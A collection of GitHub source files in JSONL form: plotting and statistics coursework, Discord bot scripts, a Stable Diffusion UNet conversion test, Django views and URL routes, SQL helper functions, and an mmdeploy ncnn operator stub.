 +{"seq_id":"73252223527","text":"from pylab import *\nfrom scipy.integrate import quad\nimport numpy as np\nimport os\n\n# paths\nmy_path = os.path.abspath(r\"C:\\Users\\Heine\\Desktop\\Skole\\FYS4150_Comp_Fys\\FYS4150\\Exercise_1\\plot\")\nos.chdir(r\"C:\\Users\\Heine\\Desktop\\Skole\\FYS4150_Comp_Fys\\FYS4150\\Exercise_1\\plot\")\n\nfile = np.loadtxt(\"10e6task_c.txt\", dtype = 'float', skiprows = 2, usecols = (0,1,2))\n\nfile_length = str(len(file))\nfile_header = \"Number of iterations \" + file_length\n# print(file, file_length)\n\n\n# Plotting\nfig = figure()\ngrid(True, which = 'both')\n\nplot(file[:,0], file[:,1], 'r-', label = '$approx. solution$')\nplot(file[:,0], file[:,2], 'b-', label = '$exact solution$')\n\nxlabel(r'$x$', size = 20, labelpad = 5)\nylabel(r'$f(x)$', size = 20, labelpad = 5)\ntitle(file_header)\nlegend(loc = 'best')  # 'smart' is not a valid matplotlib location; 'best' auto-places the legend\nfig.savefig('10e6ex_c.png')\nshow()\n","repo_name":"heinehn/FYS4150","sub_path":"Exercise_1/plot/plot_from_file.py","file_name":"plot_from_file.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74476540967","text":"from datetime import datetime\nimport discord\nfrom discord.ext import commands\nimport logging\nimport sys\n\nimport sub\nimport text\n\nintents = discord.Intents.default()\nintents.members = True\nbot = commands.Bot(command_prefix = text.PREFIXES, intents = intents)\n\n@bot.event\nasync def on_ready():\n    line = f\"on_ready {discord.__version__}\"\n    logging.info(line)\n    print(line)\n\ndef get_current_datetime_str():\n    return str(datetime.now()).replace(':', '-')\n\ndef update_logging_file():\n    # force=True replaces any existing handlers so a new log file is actually opened on rotation\n    logging.basicConfig(filename=f\"log/{get_current_datetime_str()}.log\", encoding=\"utf-8\", level=logging.DEBUG, force=True)\n\nlogging_count = 0\nupdate_logging_file()\n\n@bot.event\nasync def on_error(event, *args, **kwargs):\n    info = sys.exc_info()\n    line = f\"{get_current_datetime_str()}\\t{event}\\t{str(info)}\"\n    logging.error(line)\n    print(line)\n    \n    global logging_count\n    logging_count += 1\n    if logging_count > 200:\n        update_logging_file()\n        logging_count = 0  # reset the counter after rotating the log file\n\n@bot.command()\nasync def b(ctx: commands.Context):\n    await sub.begin(ctx)\n\n@bot.command()\nasync def begin(ctx: commands.Context):\n    await sub.begin(ctx)\n\n@bot.command()\nasync def o(ctx: commands.Context):\n    await sub.open(ctx)\n\n@bot.command(\"open\")\nasync def _open(ctx: commands.Context):\n    await sub.open(ctx)\n\n@bot.command()\nasync def c(ctx: commands.Context):\n    await sub.close(ctx)\n\n@bot.command()\nasync def join(ctx: commands.Context):\n    await sub.close(ctx)\n\n@bot.command()\nasync def k(ctx: commands.Context, arg: str = None):\n    await sub.kill(ctx, arg)\n\n@bot.command()\nasync def kill(ctx: commands.Context, arg: str = None):\n    await sub.kill(ctx, arg)\n\n@bot.command()\nasync def r(ctx: commands.Context):\n    await sub.reset(ctx)\n\n@bot.command()\nasync def reset(ctx: commands.Context):\n    await sub.reset(ctx)\n\n@bot.command()\nasync def e(ctx: commands.Context):\n    await sub.end(ctx)\n\n@bot.command()\nasync def end(ctx: commands.Context):\n    await sub.end(ctx)\n\n@bot.event\nasync def on_message(message: discord.Message):\n    if message.author.bot:\n        return\n\n    if bot.user.id in [member.id for member in message.mentions]:\n        await sub.begin(commands.Context(message = message, prefix = ''))\n        return\n    \n    for prefix in text.PREFIXES:\n        if prefix == message.content:\n            await message.channel.send(text.HELP_TEXT)\n            return\n    \n    await bot.process_commands(message)\n\n@bot.event\nasync def on_reaction_add(reaction: discord.Reaction, user):\n    await sub.on_reaction_add(reaction, user)\n\n@bot.event\nasync def on_reaction_remove(reaction: discord.Reaction, user):\n    await sub.on_reaction_remove(reaction, user)\n\n@bot.event\nasync def on_voice_state_update(member: discord.Member, before: discord.VoiceState, after: discord.VoiceState):\n    await sub.on_voice_state_update(member, before, after)\n\nwith open(\"./token.txt\", encoding = \"utf-8\") as file:\n    token = file.read().strip()  # strip the trailing newline that editors usually add\nbot.run(token)","repo_name":"HotariTobu/AUBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3452965981","text":"import torch\nfrom diffusers import UNet2DConditionModel\n\nunet = UNet2DConditionModel.from_pretrained(\"CompVis/stable-diffusion-v1-4\",\n                                            torch_dtype=torch.float16,\n                                            revision=\"fp16\",\n                                            subfolder=\"unet\")\nunet.cuda(1)\ninputs = torch.randn(2, 4, 64, 64, dtype=torch.half, device='cuda:1'), torch.tensor([1, 3], dtype=torch.int32, device='cuda:1'), torch.randn(2, 77, 768, dtype=torch.half, device='cuda:1')\n\nimport fastldm.modules as fm\nfrom fastldm.modifier import modify, MODIFIER\nmap_dict = {\n    torch.nn.LayerNorm: fm.LayerNorm,\n    torch.nn.GroupNorm: fm.GroupNorm,\n}\nunet = modify(unet, map_dict)\n\nfrom fastldm.experiment import experiment_onnx, experiment_trt\nfrom fastldm.environ import ONNX_ONLY\nif ONNX_ONLY:\n    measure, var, outputs = experiment_onnx(unet, inputs)\nelse:\n    measure, var, outputs = experiment_trt(unet, inputs)\n\nprint(var)\nbreakpoint()\nfor i in range(len(outputs[type(unet).__name__])):\n    out_model = outputs[type(unet).__name__][i].cpu()\n    out_ort = outputs['TRTModule'][i].cpu()\n\n    from fastldm.helper import profile_outdiff\n    measure = profile_outdiff(out_model, out_ort)\n    # print(measure)\n    import pprint\n    pp = pprint.PrettyPrinter(indent=4)\n    pp.pprint(measure)\n    breakpoint()","repo_name":"THUDM/FastLDM","sub_path":"examples/transform_diffusers_unet.py","file_name":"transform_diffusers_unet.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"27716228084","text":"import gzip\n\ndef list_tables(tables):\n    \"\"\"\n    This function prints the list of tables.\n    \n    Parameters\n    ----------\n    tables: \n        List of tables in the database\n\n    Returns\n    -------\n    None\n    \"\"\"\n\n    print(\"\\nLIST OF TABLES: \")\n    counter = 1\n    for table in tables:\n        row = f'{counter}. {table[0]}'\n        print(row)\n        counter += 1\n\ndef format_table(filepath):\n    \"\"\"\n    This function formats the data to ingest in the database. 
(Input has to be a gzip file.)\n    \n    Parameters\n    ----------\n    filepath: str\n        Path to the gzip file. A specific format of the data is required.\n\n    Returns\n    -------\n    column_names: list\n        List of column names\n    primary_key: tuple\n        Tuple of columns that constitutes the primary key\n    db_types: list\n        List of types for each column\n    rows_values: list\n        List of rows of the table\n    \"\"\"\n    if filepath.endswith('.gz'):\n        with gzip.open(filepath, \"rb\") as f:\n            # Split the data line by line and extract the metadata of the table\n            rows = f.read().split(b'\\x02\\n')\n            column_names = [el.decode('utf-8').replace('#', '') for el in rows[0].split(b'\\x01')]\n            primary_key = tuple([el.decode('utf-8').replace('#primaryKey:', '') for el in rows[1].split(b'\\x01')])\n            db_types = [el.decode('utf-8').replace('#dbTypes:', '') for el in rows[2].split(b'\\x01')]\n            rows_values = []\n            for row in rows:\n                if not row.startswith(b'#') and len(row) > 0:\n                    rows_values.append(tuple([el.decode('utf-8') for el in row.split(b'\\x01')]))\n        return column_names, primary_key, db_types, rows_values\n    else:\n        print(\"Error: Input file is not a gzip file.\")\n\ndef create_table_query(column_names, db_types, table):\n    \"\"\"\n    This function returns the sql query for creating a table.\n    \n    Parameters\n    ----------\n    column_names: list\n        List of column names\n    db_types: list\n        List of types for each column\n    table: str\n        Name for the table to create in the database\n\n    Returns\n    -------\n    full_query: str\n        Sql query for creating the table\n    \"\"\"\n\n    n_columns = len(column_names)\n    columns_query = f'({column_names[0]} {db_types[0]}, '\n    for ii in range(1, n_columns):\n        columns_query = columns_query + column_names[ii] + ' ' + db_types[ii] + ', '\n    columns_query = columns_query[:-2] + ')'\n\n    full_query = f\"CREATE TABLE {table} {columns_query}\"\n\n    return full_query\n\ndef insert_rows_query(column_names, table):\n    \"\"\"\n    This function returns the sql query for inserting rows into a table.\n    \n    Parameters\n    ----------\n    column_names: list\n        List of column names\n    table: str\n        Name of the table to insert into\n\n    Returns\n    -------\n    full_query: str\n        Sql query for inserting rows into the table\n    \"\"\"\n\n    columns_query = \"(\"\n    for col in column_names:\n        columns_query = columns_query + col + \", \"\n    columns_query = columns_query[:-2] + ')'\n\n    full_query = f\"INSERT IGNORE INTO {table} \" + columns_query + \" VALUES (\" + \"%s, \"*(len(column_names)-1) + \"%s)\"\n    \n    return full_query\n\ndef see_table(table_columns, table_preview):\n    \"\"\"\n    This function prints a table.\n    \n    Parameters\n    ----------\n    table_columns: list\n        List of column names\n    table_preview: list\n        Rows of the table to show\n\n    Returns\n    -------\n    None\n    \"\"\"\n\n    column_names = [str(el[0]) for el in table_columns]\n    format_str = \"|\" + \" {:^16} |\"*len(column_names)\n    print(format_str.format(*column_names))\n    print(\"-\"*len(format_str.format(*column_names)))\n    for row in table_preview:\n        print(format_str.format(*row))\n","repo_name":"mariohenao/max-cli","sub_path":"project/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
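# --- Editor's note: illustrative, standalone; the file name is made up. ---
# format_table() above expects a gzip file whose rows end with b'\x02\n',
# whose fields are separated by b'\x01', and whose first three rows carry
# the column names, primary key, and db types. A minimal file in that format:
import gzip

sample = (b'#id\x01#name\x02\n'
          b'#primaryKey:id\x02\n'
          b'#dbTypes:INT\x01#dbTypes:VARCHAR(16)\x02\n'
          b'1\x01alice\x02\n')
with gzip.open('sample_table.gz', 'wb') as f:
    f.write(sample)
# format_table('sample_table.gz') then returns:
# (['id', 'name'], ('id',), ['INT', 'VARCHAR(16)'], [('1', 'alice')])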
 +{"seq_id":"33486872465","text":"# coding=utf-8\nimport json\nimport discord\nimport random\nimport constant\n\ndiscordNew = discord\n\nintents = discord.Intents.default()\nintents.members = True\n\nclient = discord.Client(intents=intents)\n\nwith open(file='config.json', mode='r') as file:\n    config = json.load(file)\n\nbotId = config['botId']\n\n\ndef checkAutorNotBot(message):\n    if not message.author == client.user:\n        return True\n    else:\n        return False\n\n\ndef get_info(message):\n    channel = client.get_channel(config['start_channel'])\n    members = channel.members\n    users_array = []\n    for item in members:\n        role_array = []\n        for item_role in item.roles:\n            role_id = item_role.id\n            role_array.append(role_id)\n        # store the display name as well, since on_member_join() expects it\n        user = {'user_id': item.id, 'user_roles': role_array, 'display_name': item.display_name}\n        users_array.append(user)\n    users_json = {'users': users_array}\n    with open(file='./files/users.json', mode='w', encoding=\"utf-8\") as file:\n        json.dump(users_json, file, ensure_ascii=False)\n    pass\n\n\nasync def set_start_channel(message):\n    global config\n    message_content = message.content\n    await message.delete()\n    with open(file='config.json', mode='r') as file:\n        config_for_bot = json.load(file)\n    config_for_bot['start_channel'] = message_content.split(' ')[-1]\n    with open(file='config.json', mode='w', encoding=\"utf-8\") as file:\n        json.dump(config_for_bot, file, ensure_ascii=False)\n    with open(file='config.json', mode='r') as file:\n        config = json.load(file)\n    pass\n\n\n@client.event\nasync def on_ready():\n    constant.init()\n    constant.client = client\n    print('bot started')\n    pass\n\n\nasync def removeOldMessage(message):\n    async for messageItem in message.channel.history(limit=1000):\n        if not messageItem.id == message.id and not messageItem.pinned:\n            await messageItem.delete()\n    pass\n\n\n@client.event\nasync def on_message(message):\n    if checkAutorNotBot(message):\n        if message.content.startswith(\"-set_banner\"):\n            print(message.guild.banner)\n            guild = message.guild\n            await guild.set_banner_url(message.attachment[0].proxy_url)\n        if message.content.startswith(\"-clear\"):\n            await message.delete()\n            await removeOldMessage(message)\n        if message.content.startswith(\"-get_info\"):\n            get_info(message)\n        if message.content.startswith(\"-set_start_channel\"):\n            await set_start_channel(message)\n    return\n\n\n@client.event\nasync def on_member_join(member):\n    roles_array = []\n    display_name = member.display_name  # fall back to the current name if the member is unknown\n    with open(file='./files/users.json', mode='r') as file:\n        users_json = json.load(file)\n    for user in users_json['users']:\n        if user['user_id'] == member.id:\n            roles_array = user['user_roles']\n            display_name = user['display_name']\n    guild = member.guild\n    await member.edit(nick=display_name)\n    for role_id in roles_array:\n        role = guild.get_role(role_id)  # get the role object\n        if not role.name == '@everyone':\n            await member.add_roles(role)\n
\n\ndef get_roles_array(member):\n    roles_array = []\n    for role_item in member.roles:\n        role = role_item.id\n        roles_array.append(role)\n    return roles_array\n\n\n@client.event\nasync def on_member_remove(member):\n    roles_array = []\n    new_user = True\n    display_name = member.display_name\n    with open(file='./files/users.json', mode='r') as file:\n        users_json = json.load(file)\n    for user in users_json['users']:\n        if user['user_id'] == member.id:\n            new_user = False\n            roles_array = get_roles_array(member)\n            user['user_roles'] = get_roles_array(member)\n            try:\n                user['display_name'] = display_name\n            except Exception:\n                users_json['users'].remove(user)\n                user_new = {'user_id': member.id,\n                            'user_roles': roles_array,\n                            'display_name': display_name}\n                users_json['users'].append(user_new)\n    if new_user:\n        user_new = {'user_id': member.id,\n                    'user_roles': get_roles_array(member),\n                    'display_name': display_name}\n        users_json['users'].append(user_new)\n    with open(file='./files/users.json', mode='w', encoding=\"utf-8\") as file:\n        json.dump(users_json, file, ensure_ascii=False)\n    print(member)\n\n\nworkSpace = 'production'\nclient.run(config['tokenDiscordProd'])\n\n# python3 -m pip install -U discord.py\n# pip install -U discord-py-slash-command\n# pip install -U discord_components\n# pip3 install discord\n","repo_name":"mamadraArtStation/pluton","sub_path":"pluton.py","file_name":"pluton.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
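# --- Editor's note: illustrative, standalone. ---
# Based on get_info() and on_member_remove() above, ./files/users.json is
# assumed to have this shape (the ids and names below are made up):
import json

users_json = {
    "users": [
        {"user_id": 123456789, "user_roles": [111, 222], "display_name": "Alice"}
    ]
}
print(json.dumps(users_json, ensure_ascii=False, indent=2))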
 +{"seq_id":"23674247469","text":"\"\"\"\nCSCI 150 Lab 5\n\nName: Finn Ellingwood\n\nCreativity: \n\nEnter file to analyze: 95age.txt\nFile contained 35326 entries\nMax: 90\nMin: 0 (anyone who was born in 1995 would be 0)\nAverage: 35.73141595425466\nMedian: 34.0\nStd. dev: 22.54500613160593\n\nEnter file to analyze: 95income.txt\nFile contained 35326 entries\nMax: 304998\nMin: -13411 (this would represent a loss of money)\nAverage: 16974.277925607203\nMedian: 8929.5\nStd. dev: 22838.78036356643\n\nEnter file to analyze: 95kids.txt\nFile contained 35326 entries\nMax: 9 (a lot of kids!)\nMin: 0\nAverage: 0.43285398856366414\nMedian: 0.0\nStd. dev: 0.8975902261264251\n\"\"\"\n\nimport os.path\n\nvalues = []  # module-level list of parsed integers (naming it 'list' would shadow the builtin)\n\ndef data_analysis():\n    \"\"\"\n    Asks the user to input an existing txt file to be read into\n    a list and uses said list to calculate given statistics about it such\n    as max, min, median, average, and standard deviation.\n    \n    Args:\n        None\n    \n    Returns:\n        Nothing\n    \"\"\"\n    \n    file = input(\"Enter file to analyze: \")\n    \n    if open_file(file):\n        return\n    \n    element_num = len(values)\n    \n    if len(values) == 0:\n        print(\"File contained 0 entries\")\n    else:\n        print(\"File contained \"+str(element_num)+\" entries\")\n        maxi = max(values)\n        mini = min(values)\n        total = sum(values)\n        avg = total / element_num\n        median = middle(values)\n        dev = stdev(values)\n        \n        print(\"Max:\",maxi)\n        print(\"Min:\",mini)\n        print(\"Average:\",avg)\n        print(\"Median:\",median)\n        print(\"Std. dev:\",dev)\n    \n    \ndef open_file(file):\n    \"\"\"\n    Opens the given file and reads its integers into the module-level list\n    \n    Args:\n        file: path to an existing txt file\n    \n    Returns:\n        True if the file could not be found, otherwise None;\n        the parsed integers are appended to the module-level list\n    \"\"\"\n    if os.path.exists(file):\n        with open(file, \"r\") as file:\n            for line in file:\n                # Assumes one entry per line\n                # (int() tolerates the newline at the end of the line)\n                values.append(int(line))\n    else:\n        print(\"\\033[3;31mERROR LOCATING SPECIFIED FILE!\\033[0;0m\")\n        return True\n    \ndef middle(data):\n    \"\"\"\n    Calculates the median of a given list of integers\n    \n    Args:\n        data: a list of integers in any order to be sorted\n    \n    Returns:\n        The median of the given list: the middle element if the list\n        has odd length, or the average of the two middle values if the\n        length is even\n    \"\"\"\n    sorted_list = sorted(data)\n    \n    if len(sorted_list) % 2 == 1:\n        midd = int(len(sorted_list) // 2)\n        midd = sorted_list[midd]\n    else:\n        midd = int(len(sorted_list) // 2)\n        midd = (sorted_list[midd] + sorted_list[midd - 1]) / 2\n    return midd\n\ndef stdev(data):\n    \"\"\"\n    Calculates the sample standard deviation of a given list\n    \n    Args:\n        data: a list of integers in any order\n    \n    Returns:\n        The sample standard deviation of the given list as a float\n    \"\"\"\n    n = len(data)\n    mean = sum(data) / n\n    var = sum((x - mean) ** 2 for x in data) / (n - 1)\n    std_dev = var ** .5\n    return std_dev\n\ndef frequencies(data):\n    \n    \"\"\"\n    Prints the frequency of each item in the list data\n    \n    Args:\n        data: List of \"sortable\" data items\n    \"\"\"\n    data.sort()\n    \n    count = 0\n    previous = data[0]\n\n    print(\"data\\tfrequency\")  # '\\t' is the TAB character\n\n    for d in data:\n        if d == previous:\n            # Same as the previous, increment the count for the run\n            count += 1\n        else:\n            # We've found a different item so print out the old and reset the count\n            print(str(previous) + \"\\t\" + str(count))\n            count = 1\n        \n        previous = d\n    # print the final run (the original printed a hard-coded count of 1 here)\n    print(str(previous) + \"\\t\" + str(count))\n    \n# Main program that gets executed when program is run\n# (Leave this as is, no changes to be made)\nif __name__ == '__main__':\n    # This invokes the data_analysis function when the program is run\n    data_analysis()\n","repo_name":"Norvoke/middcs150","sub_path":"Week 6/lab5_data_analysis1.py","file_name":"lab5_data_analysis1.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19024488278","text":"# Write a Python program to replace last value of tuples in a list\n# Sample list: [(10, 20, 40), (40, 50, 60), (70, 80, 90)]\n# Expected Output: [(10, 20, 100), (40, 50, 100), (70, 80, 100)]\nimport os\nos.system(\"cls\")\nx = eval(input(\"Enter a list:- \"))\nfor i in range(len(x)):\n    temp_list = list(x[i])\n    temp_list[-1] = 100\n    x[i] = tuple(temp_list)\nprint(x)","repo_name":"Awesome-Abhay/Python-Programs","sub_path":"new23.py","file_name":"new23.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
 +{"seq_id":"5181837053","text":"# Łukasz Wilański\nfrom kol1testy import runtests\n\n# For every term of the sum, the algorithm builds the window that will contain the k-th largest element.\n# To find that element it uses partition() and repeats it until the sought element equals the pivot.\n# Time complexity O(np), space complexity O(1)\n\ndef partition(A, l, r):\n    pivot = A[r]\n    i = l - 1\n    for j in range(l, r):\n        if A[j] <= pivot:\n            i += 1\n            A[i], A[j] = A[j], A[i]\n    A[i + 1], A[r] = A[r], A[i + 1]\n    return i + 1\n\ndef ksum(T, k, p):\n    wyn = 0\n    for i in range(0, len(T) - p + 1):\n        arr = []\n        for j in range(i, i + p):\n            arr.append(T[j])\n\n        s = 0\n        e = len(arr) - 1\n        while True:\n            v = partition(arr, s, e)\n            if v > len(arr) - k:\n                e = v - 1\n            elif v < len(arr) - k:\n                s = v + 1\n            if v == len(arr) - k:\n                break\n        wyn += arr[v]\n    return wyn\n\n\n# set all_tests to True to run all the tests\nruntests(ksum, all_tests=True)\n\n\n","repo_name":"youngbucu/Studia","sub_path":"ASD/kol1/kol1.py","file_name":"kol1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
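# --- Editor's note: illustrative usage; assumes ksum() from kol1.py above is in scope. ---
# ksum() slides a window of length p and quickselects the k-th largest element
# in each window: partition() is repeated until the pivot lands at index
# len(arr) - k. For windows of length 3 and k = 2 (second largest per window):
print(ksum([1, 5, 2, 4, 3], 2, 3))  # windows [1,5,2], [5,2,4], [2,4,3] -> 2 + 4 + 3 = 9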
 +{"seq_id":"32918620732","text":"from django.conf.urls.defaults import *\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\n# NOTE: the names of the (?P<...>) capture groups were lost in extraction;\n# the names below are assumed from the surrounding view and url names.\nurlpatterns = patterns('assassins_manager.services',\n    url(r'^cron/$', 'game_cron'),\n    )\nurlpatterns += patterns('assassins_manager.views',\n    url(r'^info/$', 'about', name='about'),\n    )\nurlpatterns += patterns('assassins_manager.game.views',\n    url(r'^(?P<game>.+)/details/$', 'details', name='game_details'),\n    url(r'^(?P<game>.+)/join/$', 'join_game', name='game_join'),\n    url(r'^(?P<game>.+)/leave/$', 'leave_game', name='game_leave'),\n    url(r'^(?P<game>.+)/scoreboard/$', 'scoreboard', name='game_scoreboard'),\n    url(r'^(?P<game>.+)/a/(?P<page>\\d+)/$', 'assassins'),\n    url(r'^(?P<game>.+)/a/$', 'assassins', name='game_assassins_list'),\n    url(r'^(?P<game>.+)/p/$', 'police', name='game_police_list'),\n    url(r'^(?P<game>.+)/d/$', 'disavowed', name='game_disavowed_list'),\n    url(r'^(?P<game>.+)/s/$', 'squads', name='game_squads_list'),\n    url(r'^(?P<game>.+)/c/$', 'contracts', name='game_contracts_list'),\n    url(r'^(?P<game>.+)/admin/start_game/$', 'start_game', name='game_start'),\n    url(r'^(?P<game>.+)/admin/end_game/$', 'end_game', name='game_end'),\n    url(r'^(?P<game>.+)/admin/reset_game/$', 'reset_game', name='game_reset'),\n    url(r'^(?P<game>.+)/admin/delete_game/$', 'delete_game', name='game_delete'),\n    url(r'^(?P<game>.+)/admin/add_police/$', 'add_police', name='police_add'),\n    url(r'^(?P<game>.+)/admin/remove_police/$', 'remove_police', name='police_remove'),\n    url(r'^(?P<game>.+)/admin/$', 'game_admin', name='game_admin'),\n    url(r'^create_game/$', 'create_game', name='game_create'),\n    url(r'^$', 'gamelist', name='game_list'),\n    )\nurlpatterns += patterns('assassins_manager.squad.views',\n    url(r'^(?P<game>.+)/s/details/(?P<squad_id>\\d+)/$', 'details', name='squad_details'),\n    url(r'^(?P<game>.+)/s/details/$', 'my_details', name='my_squad_details'),\n    url(r'^(?P<game>.+)/s/contracts/$', 'my_contracts', name='my_contracts'),\n    url(r'^(?P<game>.+)/s/add_squad/$', 'add_squad', name='squad_add'),\n    url(r'^(?P<game>.+)/s/join_squad/$', 'join_squad', name='squad_join'),\n    url(r'^(?P<game>.+)/s/leave_squad/$', 'leave_squad', name='squad_leave'),\n    )\nurlpatterns += patterns('assassins_manager.assassin.views',\n    url(r'^(?P<game>.+)/a/details/(?P<assassin>.+)/$', 'details', name='assassin_details'),\n    url(r'^(?P<game>.+)/a/details/$', 'my_details', name='my_details'),\n    )\nurlpatterns += patterns('assassins_manager.kill.views',\n    url(r'^(?P<game>.+)/report_kill/$', 'report_kill', name='report_kill'),\n    url(r'^(?P<game>.+)/report_kill_admin/$', 'report_kill_admin', name='report_kill_admin'),\n    url(r'^report_kill_text/(?P<game>.+)/(?P<code>.+)/$', 'report_kill_text', name='report_kill_text'),\n    url(r'^text/$', 'text', name='text'),\n    )\nurlpatterns += patterns('assassins_manager.contract.views',\n    url(r'^(?P<game>.+)/c/details/(?P<contract_id>\\d+)/$', 'details', name='contract_details'),\n    )\nurlpatterns += patterns('assassins_manager.report.views',\n    url(r'^(?P<game>.+)/r/k/(?P<player>.+)/$', 'playerkills', name='player_kills'),\n    url(r'^(?P<game>.+)/r/d/(?P<player>.+)/$', 'playerdeaths', name='player_deaths'),\n    url(r'^(?P<game>.+)/r/(?P<report_id>\\d+)/$', 'killreport', name='kill_report'),\n    url(r'^(?P<game>.+)/r/$', 'killreports', name='game_kills'),\n    )\n","repo_name":"rbtying/cuassassins","sub_path":"assassins_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40441609225","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\n\nfrom base.models import CustomUser, Notification, Transaction\n\n# Create your views here.\ndef get_notifications(request):\n    if not request.user.is_authenticated:\n        return redirect(\"/\")\n\n    consumer = CustomUser.objects.get(id=request.user.id)\n    notifications = Notification.objects.all().filter(user_id=consumer.id).order_by('status', '-created_on')\n\n    data = {\n        \"consumer\": consumer,\n        \"notifications\": notifications\n    }\n\n    return render(request, \"./base/consumer/notifications.html\", data)\n\ndef get_transaction_history(request):\n    if not request.user.is_authenticated:\n        return redirect(\"/\")\n\n    consumer = CustomUser.objects.get(id=request.user.id)\n    transactions = Transaction.objects.all().filter(user_id=consumer.id).order_by('-created_on')\n\n    data = {\n        \"consumer\": consumer,\n        \"transactions\": transactions\n    }\n\n    return render(request, \"./base/consumer/transaction-history.html\", data)","repo_name":"clarkjanndy/water-billing-system","sub_path":"base/views/notification_views.py","file_name":"notification_views.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13920463491","text":"import torch\n\n\nclass NcnnDetectionOutputOp(torch.autograd.Function):\n    \"\"\"Create DetectionOutput op.\n\n    A dummy DetectionOutput operator for ncnn end2end deployment.\n    It will map to the DetectionOutput op of ncnn. 
After converting\n    to ncnn, DetectionOutput op of ncnn will get called\n    automatically.\n\n    Args:\n        loc (Tensor): The predicted boxes location tensor.\n        conf (Tensor): The predicted boxes confidence of\n            num_classes.\n        anchor (Tensor): The prior anchors.\n        score_threshold (float): Threshold of object\n            score.\n            Default: 0.35.\n        nms_threshold (float): IoU threshold for NMS.\n            Default: 0.45.\n        nms_top_k (int): Number of bboxes after NMS.\n            Default: 100.\n        keep_top_k (int): Max number of bboxes of detection result.\n            Default: 100.\n        num_class (int): Number of classes, includes the background\n            class.\n            Default: 81.\n    \"\"\"\n\n    @staticmethod\n    def symbolic(g,\n                 loc,\n                 conf,\n                 anchor,\n                 score_threshold=0.35,\n                 nms_threshold=0.45,\n                 nms_top_k=100,\n                 keep_top_k=100,\n                 num_class=81,\n                 target_stds=[0.1, 0.1, 0.2, 0.2]):\n        \"\"\"Symbolic function of dummy onnx DetectionOutput op for ncnn.\"\"\"\n        return g.op(\n            'mmdeploy::DetectionOutput',\n            loc,\n            conf,\n            anchor,\n            score_threshold_f=score_threshold,\n            nms_threshold_f=nms_threshold,\n            nms_top_k_i=nms_top_k,\n            keep_top_k_i=keep_top_k,\n            num_class_i=num_class,\n            vars_f=target_stds,\n            outputs=1)\n\n    @staticmethod\n    def forward(ctx,\n                loc,\n                conf,\n                anchor,\n                score_threshold=0.35,\n                nms_threshold=0.45,\n                nms_top_k=100,\n                keep_top_k=100,\n                num_class=81,\n                target_stds=[0.1, 0.1, 0.2, 0.2]):\n        \"\"\"Forward function of dummy onnx DetectionOutput op for ncnn.\"\"\"\n        return torch.rand(1, 100, 6)\n\n\nncnn_detection_output_forward = NcnnDetectionOutputOp.apply\n","repo_name":"open-mmlab/mmdeploy","sub_path":"mmdeploy/codebase/mmdet/ops/detection_output.py","file_name":"detection_output.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"11420466266","text":"from .helper import *\n\n\ndef voteCat(request, cat_id, vote):\n    if request.method != 'POST':\n        return HttpResponse(status=400)\n    if is_lazy_user(request.user):\n        return HttpResponse(status=400)\n    try:\n        c_objs = Category.objects.get(Cid=cat_id)\n    except Exception as e:\n        return HttpResponse(status=400)\n\n    CV_objs = CategoryVotes.objects.filter(Q(Uid=request.user) & Q(Cid=c_objs))\n    CV_len = len(CV_objs)\n    if CV_len < 1:\n        CategoryVotes.objects.create(Cid=c_objs, Uid=request.user, vote=vote - 10)  # create() already saves\n    elif CV_len == 1:\n        cv_obj = CV_objs[0]  # update the single existing vote object, not the queryset\n        cv_obj.vote = vote - 10\n        cv_obj.save()\n    return HttpResponse(status=200)\n\ndef voteQuestion(request, q_id, vote):\n    if request.method != 'POST':\n        return HttpResponse(status=404)\n    if is_lazy_user(request.user):\n        return HttpResponse(status=400)\n    try:\n        q_objs = Question.objects.get(Qid=q_id)\n    except Exception as e:\n        return HttpResponse(status=400)\n    QV_objs = QuestionVotes.objects.filter(Q(Uid=request.user) & Q(Qid=q_objs))\n    QV_len = len(QV_objs)\n    if QV_len < 1:\n        QuestionVotes.objects.create(Qid=q_objs, Uid=request.user, vote=vote - 10)  # create() already saves\n    elif QV_len == 1:\n        qv_obj = QV_objs[0]  # update the single existing vote object, not the queryset\n        qv_obj.vote = vote - 10\n        qv_obj.save()\n\n    return HttpResponse(status=200)\n
